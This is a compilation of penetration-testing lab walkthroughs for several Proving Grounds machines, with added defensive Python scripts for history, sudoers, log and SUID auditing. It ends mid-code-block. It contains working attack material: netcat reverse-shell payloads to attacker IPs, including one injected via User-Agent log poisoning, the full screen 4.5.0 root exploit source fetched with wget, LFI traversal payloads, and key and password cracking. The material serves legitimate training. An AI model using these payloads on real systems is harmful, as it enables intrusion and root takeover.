pg-funboxrookie-play

Exploitation Guide for FunboxRookie

Summary

This machine is exploited via an anonymous FTP server that exposes a password-protected archive containing an SSH private key (id_rsa), followed by the disclosure of user credentials in a MySQL history file. Privilege escalation is via an unrestricted sudo rule that allows the user to run any command with elevated privileges.

Enumeration

Nmap

We start off by running an nmap scan:

kali@kali:~$ sudo nmap 192.168.120.138
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-14 13:07 EDT
Nmap scan report for 192.168.120.138
Host is up (0.032s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

We can run a more detailed nmap scan with the -sC flag against the discovered ports:

kali@kali:~$ sudo nmap -p 21,22,80 192.168.120.138 -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-14 13:09 EDT
Nmap scan report for 192.168.120.138
Host is up (0.030s latency).

PORT   STATE SERVICE
21/tcp open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:51 anna.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:50 ariel.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:52 bud.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:58 cathrine.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:51 homer.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:51 jessica.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:50 john.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:51 marge.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:50 miriam.zip
| -r--r--r--   1 ftp      ftp          1477 Jul 25 10:44 tom.zip
| -rw-r--r--   1 ftp      ftp           170 Jan 10  2018 welcome.msg
|_-rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:51 zlatan.zip
22/tcp open  ssh
| ssh-hostkey: 
|   2048 f9:46:7d:fe:0c:4d:a9:7e:2d:77:74:0f:a2:51:72:51 (RSA)
|   256 15:00:46:67:80:9b:40:12:3a:0c:66:07:db:1d:18:47 (ECDSA)
|_  256 75:ba:66:95:bb:0f:16:de:7e:7e:a1:7b:27:3b:b0:58 (ED25519)
80/tcp open  http
| http-robots.txt: 1 disallowed entry 
|_/logs/
|_http-title: Apache2 Ubuntu Default Page: It works

The FTP server listening on the default port allows for anonymous logins, and we see several zip files listed.

Exploitation

Anonymous FTP Server

Of the files shown in the scan, only tom.zip will prove useful to us. We log in anonymously and retrieve it:

kali@kali:~$ ftp 192.168.120.138
Connected to 192.168.120.138.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.120.138]
Name (192.168.120.138:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230-Welcome, archive user anonymous@192.168.118.3 !
230-
230-The local time is: Wed Oct 14 17:11:13 2020
230-
230-This is an experimental FTP server.  If you have any unusual problems,
230-please report them via e-mail to <root@funbox2>.
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get tom.zip
local: tom.zip remote: tom.zip
200 PORT command successful
150 Opening BINARY mode data connection for tom.zip (1477 bytes)
226 Transfer complete
1477 bytes received in 0.00 secs (28.1715 MB/s)
ftp> bye
221 Goodbye.
kali@kali:~$ 

However, if we try to open the archive, we will find that it is password-protected.

Password Bruteforce

We can use zip2john to convert the encrypted archive to a hash file usable by john:

kali@kali:~$ zip2john tom.zip > tom.hash
ver 2.0 efh 5455 efh 7875 tom.zip/id_rsa PKZIP Encr: 2b chk, TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6
kali@kali:~$

We can now use john and the rockyou.txt wordlist to crack the password:

kali@kali:~$ john --wordlist=/usr/share/wordlists/rockyou.txt tom.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iubire           (tom.zip/id_rsa)
1g 0:00:00:00 DONE (2020-10-14 13:17) 100.0g/s 409600p/s 409600c/s 409600C/s 123456..oooooo
Use the "--show" option to display all of the cracked passwords reliably
Session completed
kali@kali:~$

The cracker succeeds and reveals that the password is iubire. Using it, we can unlock the archive:

kali@kali:~$ unzip -P iubire tom.zip
Archive:  tom.zip
  inflating: id_rsa

kali@kali:~$

The archive contains a private SSH key, id_rsa.

SSH

Since the private key came from the archive tom.zip, we can assume that the user is named tom. Next, we set proper permissions on the key file and SSH to the target:

kali@kali:~$ chmod 0600 id_rsa
kali@kali:~$
kali@kali:~$ ssh -o StrictHostKeyChecking=no -i id_rsa tom@192.168.120.138
...
tom@funbox2:~$ id
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
tom@funbox2:~$

Escaping Restricted Shell

However, if we try to change directory (or run any other restricted command), we find that our login shell is rbash, which we must first escape:

tom@funbox2:~$ pwd
/home/tom
tom@funbox2:~$ cd ..
-rbash: cd: restricted
tom@funbox2:~$

There are many ways to do so; we choose one of the simplest: exit the current session and reconnect, passing -t "bash --noprofile" so that ssh runs an unrestricted bash (without loading the profile) instead of the restricted login shell:

tom@funbox2:~$ exit
logout
-rbash: /usr/bin/clear_console: restricted: cannot specify `/' in command names
Connection to 192.168.120.138 closed.
kali@kali:~$
kali@kali:~$ ssh -o StrictHostKeyChecking=no -i id_rsa tom@192.168.120.138 -t "bash --noprofile"
load pubkey "id_rsa": invalid format
tom@funbox2:~$ pwd
/home/tom
tom@funbox2:~$ cd ..
tom@funbox2:/home$

We are now able to traverse and enumerate the system further.

Escalation

User Password Recovery

Looking around the user’s home directory, we find a MySQL history file:

tom@funbox2:/home$ cd ~
tom@funbox2:~$ ls -la
...
-rw------- 1 tom  tom   295 Jul 25 12:04 .mysql_history
...
tom@funbox2:~$

In this file, we see the history of several MySQL commands:

tom@funbox2:~$ cat .mysql_history 
_HiStOrY_V2_
show\040databases;
quit
create\040database\040'support';
create\040database\040support;
use\040support
create\040table\040users;
show\040tables
;
select\040*\040from\040support
;
show\040tables;
select\040*\040from\040support;
insert\040into\040support\040(tom,\040xx11yy22!);
quit
tom@funbox2:~$

The line insert\040into\040support\040(tom,\040xx11yy22!); (the \040 sequences are octal-escaped spaces) is the interesting one: it contains the string xx11yy22!, which looks like a password.
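The \040 sequences are octal escapes that the mysql client writes in place of spaces, so the file reads naturally once they are expanded. As an added example (not part of the original walkthrough), the Python below decodes a .mysql_history file and flags the statements that commonly carry literal secrets; it is the check a defender would run over shell and client history files before they leak in exactly this way. The sample history is a constructed copy of the lines above, and the list of statement shapes worth flagging is my own assumption.

```python
import re
import sys
from typing import List, Tuple

# Constructed sample: the history lines shown above, exactly as the file stores them.
SAMPLE_HISTORY = r"""_HiStOrY_V2_
show\040databases;
quit
create\040database\040'support';
create\040database\040support;
use\040support
create\040table\040users;
show\040tables;
select\040*\040from\040support;
insert\040into\040support\040(tom,\040xx11yy22!);
quit
"""

# libedit-style escape: a backslash followed by three octal digits (\040 = space).
_OCTAL_ESCAPE = re.compile(r"\\([0-7]{3})")

# Statement shapes that routinely embed passwords as literals (assumed, not exhaustive).
_SECRET_BEARING = re.compile(
    r"^\s*(insert\s+into|create\s+user|alter\s+user|set\s+password|grant\s+.*identified\s+by)",
    re.IGNORECASE,
)


def decode_history_line(line: str) -> str:
    """Expand \\ooo octal escapes back into the characters they encode."""
    return _OCTAL_ESCAPE.sub(lambda m: chr(int(m.group(1), 8)), line)


def parse_mysql_history(text: str) -> List[str]:
    """Return the decoded statements, dropping the _HiStOrY_V2_ header and blank lines."""
    lines = text.splitlines()
    if lines and lines[0].startswith("_HiStOrY_V"):
        lines = lines[1:]
    return [decode_history_line(l) for l in lines if l.strip()]


def find_secret_bearing(statements: List[str]) -> List[Tuple[int, str]]:
    """Return (position, statement) pairs for statements that may embed a credential."""
    return [(i, s) for i, s in enumerate(statements) if _SECRET_BEARING.search(s)]


def audit_history_file(path: str) -> List[Tuple[int, str]]:
    """Decode a history file on disk and return the statements worth reviewing."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return find_secret_bearing(parse_mysql_history(fh.read()))


if __name__ == "__main__":
    # Usage: python audit_mysql_history.py [~/.mysql_history]; defaults to the sample.
    if len(sys.argv) > 1:
        hits = audit_history_file(sys.argv[1])
    else:
        hits = find_secret_bearing(parse_mysql_history(SAMPLE_HISTORY))
    for pos, stmt in hits:
        print(f"statement {pos}: {stmt}")
```

The flagged statement should be treated as a credential exposure and the value rotated; the client itself can be told not to record history at all by pointing MYSQL_HISTFILE at /dev/null.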

Sudo Escalation

Using this password to enumerate sudo privileges works, and we see that tom can run any command with sudo once the password is supplied:

tom@funbox2:~$ sudo -l
[sudo] password for tom: 
Matching Defaults entries for tom on funbox2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User tom may run the following commands on funbox2:
    (ALL : ALL) ALL
tom@funbox2:~$

We can easily use this to get a root shell:

tom@funbox2:~$ sudo su
root@funbox2:/home/tom# id
uid=0(root) gid=0(root) groups=0(root)
root@funbox2:/home/tom#
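The (ALL : ALL) ALL rule above is what the sudoers file grants, and the same class of rule (with NOPASSWD added) is what lets takis become root without a password in the Wpwn section further down this page. As an added example, not part of either walkthrough, the Python below parses sudoers-style specification lines and rates each one, so an administrator can pull out the entries that amount to an unrestricted root grant. The sample entries are constructed: the tom and takis lines mirror what the page reports, the others are made up for contrast, and the severity scale is my own assumption.

```python
import re
from typing import Dict, List

# Constructed sudoers-style lines. tom mirrors the `sudo -l` output above ((ALL : ALL) ALL);
# takis mirrors the passwordless rule reported on Wpwn; deploy and %sudo are made up.
SAMPLE_SUDOERS = """
# User privilege specification
root    ALL=(ALL:ALL) ALL
tom     ALL=(ALL:ALL) ALL
takis   ALL=(ALL) NOPASSWD: ALL
deploy  ALL=(www-data) NOPASSWD: /usr/bin/systemctl restart app.service
%sudo   ALL=(ALL:ALL) ALL
Defaults env_reset
"""

# who  host = (runas) [TAG: ...] commands
_SPEC = re.compile(
    r"^(?P<who>[%+]?\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)
_SKIP_PREFIXES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")


def rate(rule: Dict) -> str:
    """Assumed severity scale: an unrestricted command set is the dominant risk factor."""
    unrestricted = rule["cmds"] == "ALL"
    if unrestricted and rule["nopasswd"]:
        return "critical"   # any command, no password: the account is root
    if unrestricted:
        return "high"       # any command, but the account password is still required
    if rule["nopasswd"]:
        return "medium"     # limited command, but nothing stops a hijacked session
    return "low"


def parse_sudoers(text: str) -> List[Dict]:
    """Parse user/group specification lines; aliases and Defaults are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith(_SKIP_PREFIXES):
            continue
        m = _SPEC.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        rule = {
            "who": m.group("who"),
            "host": m.group("host"),
            "runas": m.group("runas") or "root",   # sudo's default target user
            "nopasswd": "NOPASSWD" in tags,
            "cmds": m.group("cmds").strip(),
        }
        rule["risk"] = rate(rule)
        rules.append(rule)
    return rules


def risky_rules(rules: List[Dict], minimum: str = "high") -> List[Dict]:
    """Keep rules at or above the given severity, preserving file order."""
    order = ["low", "medium", "high", "critical"]
    return [r for r in rules if order.index(r["risk"]) >= order.index(minimum)]


if __name__ == "__main__":
    for r in risky_rules(parse_sudoers(SAMPLE_SUDOERS)):
        print(f"{r['risk']:8} {r['who']:8} runas={r['runas']:8} cmds={r['cmds']}")
```

The useful comparison is between the tom and takis rows: both grant every command, but the password requirement is the only thing that separated a leaked history file from an immediate root shell here, which is why the parser keeps NOPASSWD as a separate field rather than folding it into the command list.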

pg-dc5-play

DC5

Nmap
sudo nmap 192.168.184.26 -p- -sS -sV
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.6.2
111/tcp open rpcbind 2-4 (RPC #100000)
38106/tcp open status 1 (RPC #100024)

Port 80 on the target serves the following web page. Several sub-pages contain non-English text; after translating a few paragraphs, it turns out to be mostly gibberish.

Clicking the home button returns us to the same page, but this time we notice the URL is /index.php. I then ran feroxbuster against the site to identify more pages:

feroxbuster --url http://192.168.184.26 -w /usr/share/seclists/Discovery/Web-Content/raft-large-files-lowercase.txt -s 200,300,301 -x php

contact.php appears to be the only page that takes some form of input.

After submitting some test information we are directed to /thankyou.php where the URL contains our input from the previous page.

At this point I decided to test thankyou.php for injection. I caught the request in Burp Suite, sent it to Intruder, and set the payload position as shown below.

I then added the command injection list as shown below as the payload.

cmd=../../../../../etc/passwd
?exec=../../../../../etc/passwd
?command=../../../../../etc/passwd
?execute../../../../../etc/passwd
?ping=../../../../../etc/passwd
?query=../../../../../etc/passwd
?jump=../../../../../etc/passwd
?code=../../../../../etc/passwd
?reg=../../../../../etc/passwd
?do=../../../../../etc/passwd
?func=../../../../../etc/passwd
?arg=../../../../../etc/passwd
?option=../../../../../etc/passwd
?load=../../../../../etc/passwd
?process=../../../../../etc/passwd
?step=../../../../../etc/passwd
?read=../../../../../etc/passwd
?function=../../../../../etc/passwd
?req=../../../../../etc/passwd
?feature=../../../../../etc/passwd
?exe=../../../../../etc/passwd
?module=../../../../../etc/passwd
?payload=../../../../../etc/passwd
?run=../../../../../etc/passwd
?print=../../../../../etc/passwd
?file=../../../../../etc/passwd

Make sure payload URL-encoding is turned off in Intruder: with it on, the '?' was being encoded and the results were wrong.

Reviewing the results shows that the ?file= parameter appears to be vulnerable, as its response content length differs greatly from the other values.

Viewing this in the browser shows us valid results.

We can fuzz for further files using wfuzz and the command below:

wfuzz -c -w lfi.txt --hl 42 http://192.168.184.26/thankyou.php?file=../../../../../../../FUZZ

The LFI wordlist used here (lfi.txt, 29 KB) was attached to the original post.

Once wfuzz completes, two interesting paths stand out:

/var/log/nginx/access.log
/var/log/nginx/error.log

Checking out access.log we can see requests we have made.

We can capture a request in Burp Suite and place a PHP reverse shell in the User-Agent header. Once that header has been written to the log, including the log file through the LFI executes it and gives us a reverse shell.

The payload placed in the User-Agent is:

<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.211 80 >/tmp/f') ?>

With a netcat listener running, we then request the log file again through the LFI: http://192.168.211.26/thankyou.php?file=../../../../../../../var/log/nginx/access.log

When we attempt to load the log files the page should hang and we get a reverse shell.
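The two halves of this technique, a traversal payload in the file parameter and a PHP tag in a client-controlled header, both land verbatim in the nginx access log, so they are easy to spot from the defender's side. As an added example that is not part of the original writeup, the Python below parses combined-format access-log lines and reports traversal probes, requests that pull the log itself back through an include parameter, and PHP tags in the URI, Referer or User-Agent. The log lines are constructed (RFC 5737 documentation addresses) to mirror the sequence described above; the label names are my own.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote

# Constructed nginx access-log lines (combined format), modelled on the steps above:
# normal browsing, a traversal probe, a PHP tag in the User-Agent, then a request that
# includes the access log itself.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Aug/2020:09:25:01 +0000] "GET /index.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Aug/2020:09:25:07 +0000] "GET /thankyou.php?file=../../../../../etc/passwd HTTP/1.1" 200 1623 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Aug/2020:09:26:10 +0000] "GET /thankyou.php HTTP/1.1" 200 42 "-" "<?php echo 'x'; ?>"
203.0.113.5 - - [12/Aug/2020:09:26:15 +0000] "GET /thankyou.php?file=../../../../../../../var/log/nginx/access.log HTTP/1.1" 200 9021 "-" "Mozilla/5.0"
"""

# $remote_addr - $remote_user [$time_local] "$request" $status $bytes "$referer" "$user_agent"
_COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
_TRAVERSAL = re.compile(r"\.\.[/\\]")
_PHP_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)
# Files an attacker includes back through the LFI after poisoning them.
_LOG_PATHS = ("/var/log/", "/proc/self/", "access.log", "error.log")


def inspect_line(line: str) -> List[str]:
    """Return the finding labels for one log line (empty list when it looks benign)."""
    m = _COMBINED.match(line)
    if not m:
        return ["unparsed-line"]
    # Decode once so %2e%2e%2f-style encoding cannot hide a traversal.
    uri = unquote(m.group("uri"))
    findings = []
    if _TRAVERSAL.search(uri):
        if any(p in uri for p in _LOG_PATHS):
            findings.append("log-file-inclusion")   # the poisoning pivot itself
        else:
            findings.append("path-traversal")
    for field in ("uri", "referer", "ua"):
        if _PHP_TAG.search(unquote(m.group(field))):
            findings.append(f"php-tag-in-{field}")
            break
    return findings


def scan_access_log(lines) -> List[Tuple[int, str, str]]:
    """Return (line_number, client_ip, finding) triples for every suspicious line."""
    results = []
    for n, line in enumerate(lines, start=1):
        if not line.strip():
            continue
        m = _COMBINED.match(line)
        ip = m.group("ip") if m else "?"
        for finding in inspect_line(line):
            results.append((n, ip, finding))
    return results


if __name__ == "__main__":
    for n, ip, finding in scan_access_log(SAMPLE_LOG.splitlines()):
        print(f"line {n} from {ip}: {finding}")
```

The fix on the application side is not to pass user input to include() at all (map a short token to a fixed file); the log-side detection above is the compensating control that catches the attempt when the code cannot be changed immediately.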

Searching for SUID binaries on the machine shows that screen-4.5.0 has the SUID bit set:

find / -perm -u=s -type f 2>/dev/null

Researching on Google shows a local privilege escalation exploit for this binary version.

GitHub: XiphosResearch/exploits, directory screen2root ("Miscellaneous exploit code").

The original exploit is a single script; here it is broken down into its component files so they can be built on the attacking machine and uploaded. Follow the steps below to get a shell.

libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
/* Runs automatically when the library is loaded through ld.so.preload. */
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}

Compile libhax.c

gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c

rootshell.c
#include <stdio.h>
#include <unistd.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    char *argv[] = {"/bin/sh", NULL};
    execvp(argv[0], argv);
    return 1;
}

Compile rootshell.c

gcc -o /tmp/rootshell /tmp/rootshell.c

Create exploit bash script.

exploit.sh
#!/bin/bash
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
echo "[+] Triggering..."
screen -ls

Upload compiled files to target machine.

wget http://192.168.49.211/rootshell
wget http://192.168.49.211/libhax.so
wget http://192.168.49.211/exploit.sh

Once uploaded make the bash script executable:

chmod +x exploit.sh

Run exploit.sh, then run /tmp/rootshell to obtain a shell as root.

pg-dawn-play

Dawn

Nmap
sudo nmap 192.168.55.11 -p- -sS -sV
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.5.5-10.3.15-MariaDB-1
Service Info: Host: DAWN

On port 445 we are able to list shares without credentials. We see the share ITDEPT is open to us.

kali@kali:~/dawn$ smbclient -U '' -L \\\\192.168.55.11\\
Enter WORKGROUP\'s password:

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	ITDEPT          Disk      PLEASE DO NOT REMOVE THIS SHARE. IN CASE YOU ARE NOT AUTHORIZED TO USE THIS SYSTEM LEAVE IMMEADIATELY.
	IPC$            IPC       IPC Service (Samba 4.9.5-Debian)
SMB1 disabled -- no workgroup available
kali@kali:~/dawn$

We then connect directly to the ITDEPT share:

kali@kali:~/dawn$ smbclient -U '' \\\\192.168.55.11\\ITDEPT
Enter WORKGROUP\'s password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Aug 2 23:23:20 2019
.. D 0 Wed Jul 22 13:19:41 2020

7158264 blocks of size 1024. 3518364 blocks available
smb: \>

I then used curl to test whether the share is writable, and confirmed that I could upload a PHP reverse shell, which might come in handy later:

kali@kali:~/dawn$ curl --upload-file rev.php -u '' smb://192.168.55.11/ITDEPT//rev.php
Enter host password for user '':
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  5496    0     0  100  5496      0   536k --:--:-- --:--:-- --:--:--  596k
kali@kali:~/dawn$

Running dirsearch.py on port 80 reveals two interesting directories:

python3 dirsearch.py -u http://192.168.152.11 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 60 --full-url

Moving into /logs shows a list of log files, of which management.log is the only one we have permission to read.

Reading the log file, the lines below appear frequently:

2020/08/12 09:25:0 CMD: UID=33 PID=1360 | /bin/sh -c /home/dawn/ITDEPT/web-control
2020/08/12 09:25:0 CMD: UID=1000 PID=1359 | /bin/sh -c /home/dawn/ITDEPT/product-control

Since we have write access to the ITDEPT share, we can upload a reverse shell named web-control, and in theory the scheduled command above should execute it.

First, I created a file called web-control containing a netcat reverse shell:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.55.200 9001 >/tmp/f

This was then uploaded to the SMB share.

smb: \> put web-control 
putting file web-control as \web-control (81.0 kb/s) (average 30.2 kb/s)
smb: \> ls
. D 0 Thu Sep 2 09:34:20 2021
.. D 0 Wed Jul 22 13:19:41 2020
rev.php A 5496 Thu Sep 2 09:13:41 2021
web-control A 83 Thu Sep 2 09:38:54 2021

7158264 blocks of size 1024. 3518292 blocks available
smb: \>

After doing so I soon receive a shell back on my netcat listener.

kali@kali:~/dawn$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [192.168.55.200] from (UNKNOWN) [192.168.55.11] 34450
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c 'import pty; pty.spawn("/bin/bash")'
Next I searched for SUID binaries and found that zsh has the SUID bit set:
www-data@dawn:~$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/sbin/mount.cifs
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/mount
/usr/bin/zsh
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/umount
/usr/bin/chfn
/home/dawn/ITDEPT
www-data@dawn:~$
Since zsh is a shell, executing it by its full path gives us a shell with an effective UID of root:
www-data@dawn:~$ /usr/bin/zsh
/usr/bin/zsh
dawn# id 
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
dawn# cd /root 
cd /root
dawn# ls 
ls
flag.txt proof.txt
dawn# cat flag.txt 
cat flag.txt
Your flag is in another file...
dawn# cat proof.txt 
cat proof.txt
04bf91ebc2de37fbee66338c45a80b95
dawn#
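The find listing above is the standard way to look for this on a box, but read by eye it is only as good as the reader's memory of what a stock install ships with. As an added example that is not part of the original writeup, the Python below does the comparison mechanically: it takes a list of set-uid paths (the constructed input is the listing above), flags anything that is a shell or interpreter, and flags anything absent from a baseline. The same check covers the SUID screen, find and hping3 findings elsewhere on this page. The baseline set is an assumption for illustration; a real one has to be captured from a known-good image of the same build.

```python
import os
import stat
from typing import Dict, List

# Constructed input: the `find / -perm -4000` listing shown above, one path per line.
SAMPLE_FIND_OUTPUT = """\
/usr/sbin/mount.cifs
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/mount
/usr/bin/zsh
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/umount
/usr/bin/chfn
/home/dawn/ITDEPT
"""

# Assumed baseline of set-uid files for a stock Debian-family install of this shape.
BASELINE = {
    "/usr/sbin/mount.cifs", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/policykit-1/polkit-agent-helper-1", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/openssh/ssh-keysign", "/usr/bin/su", "/usr/bin/newgrp", "/usr/bin/pkexec",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/mount", "/usr/bin/gpasswd",
    "/usr/bin/chsh", "/usr/bin/fusermount", "/usr/bin/umount", "/usr/bin/chfn",
}

# Programs that must never be set-uid because they hand the caller an arbitrary command:
# shells and interpreters, plus the four named on this page (zsh, find, screen, hping3).
NEVER_SUID = {"sh", "bash", "dash", "zsh", "ksh", "python", "python2", "python3",
              "perl", "php", "find", "screen", "hping3"}


def classify_suid(paths: List[str], baseline=BASELINE) -> Dict[str, str]:
    """Map each unexpected set-uid path to the reason it was flagged."""
    findings = {}
    for p in paths:
        p = p.strip()
        if not p:
            continue
        name = os.path.basename(p)
        # Versioned names such as screen-4.5.0 are matched on the part before the dash.
        if name in NEVER_SUID or name.split("-")[0] in NEVER_SUID:
            findings[p] = "shell-or-interpreter"
        elif p not in baseline:
            findings[p] = "not-in-baseline"
    return findings


def live_suid_scan(root: str = "/") -> List[str]:
    """Equivalent of `find / -perm -4000 -type f`, skipping pseudo-filesystems."""
    skip = {"/proc", "/sys", "/dev"}
    found = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in skip]
        for f in filenames:
            full = os.path.join(dirpath, f)
            try:
                st = os.lstat(full)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(full)
    return found


if __name__ == "__main__":
    # Offline: classify the sample listing. On a live host, pass live_suid_scan() instead.
    for path, why in classify_suid(SAMPLE_FIND_OUTPUT.splitlines()).items():
        print(f"{why:22} {path}")
```

Note that the listing above contains /home/dawn/ITDEPT, which is a directory: the page's find command had no -type f, so the set-gid/set-uid bit on a directory shows up too. The live scan restricts itself to regular files, which is what matters for execution.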

pg-covfefe-play

Covfefe

Nmap
sudo nmap 192.168.184.10 -p- -sS -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10 (protocol 2.0)
80/tcp open http nginx 1.10.3
31337/tcp open Elite?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

I started with port 80 and was unable to identify any directories or files; the port serves the default nginx installation page.

Browsing to port 31337 returns a 404 Not Found. I then ran dirsearch.py against that port with the command below, which discovered what appeared to be the contents of a user's home directory:

python3 dirsearch.py -u http://192.168.184.10:31337 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 60 --full-url

The /.ssh directory is listable and exposes its contents.

I first downloaded the id_rsa and then authorized_keys.

http://192.168.184.10:31337/.ssh/id_rsa
http://192.168.184.10:31337/.ssh/authorized_keys

The contents of authorized_keys show that the key belongs to the user simon. First, set the correct permissions on id_rsa:

chmod 600 id_rsa

When attempting to use the key to connect by SSH we are prompted to provide a passphrase.

Using ssh2john we can convert the key to a hash which can be sent to John for cracking.

/usr/share/john/ssh2john.py id_rsa > /home/kali/Desktop/hash
sudo john --wordlist=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-100000.txt /home/kali/Desktop/hash

Now that we have the passphrase starwars for the key, we can try signing in again:

ssh -i id_rsa simon@192.168.184.10

I then transferred linpeas over and ran it. Linpeas identified the binary /usr/local/bin/read_message as having the SUID bit set.

Running the binary and entering the name ‘Simon’ produces the following output:

As per the message we can read the source code. Listing the contents of the root directory shows the source code file.

From the source, the program checks only the first 5 characters of the name, but reads the input into a 20-byte buffer. We can overflow that buffer to execute a command.

Running the following when prompted to do so by the binary will give us a root shell.

Simonaaaaaaaaaaaaaaa/bin/sh

pg-bossplayersctf-play

BossPlayersCTF

Nmap
sudo nmap 192.168.152.20 -p- -sS -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80 shows the following page.

Viewing the source code of this page reveals text at the end.

WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK

We can base64-decode this string; it must be decoded three times to reveal a plain-text string:

echo 'WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK' | base64 -d
echo 'ZDI5eWEybHVaMmx1Y0hKdlozSmxjM011Y0dod0NnPT0K' | base64 -d
echo 'd29ya2luZ2lucHJvZ3Jlc3MucGhwCg==' | base64 -d
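Decoding by hand three times works for this page, but the general form of the step is to keep decoding until the output stops being base64. As an added example that is not part of the original writeup, the Python below peels nested base64 layers and returns every intermediate, stopping when the text is no longer valid base64 or no longer printable; it is the triage helper a reviewer would reach for when an encoded string turns up in page source. It is run on the string recovered above, so the expected innermost layer is workinginprogress.php.

```python
import base64
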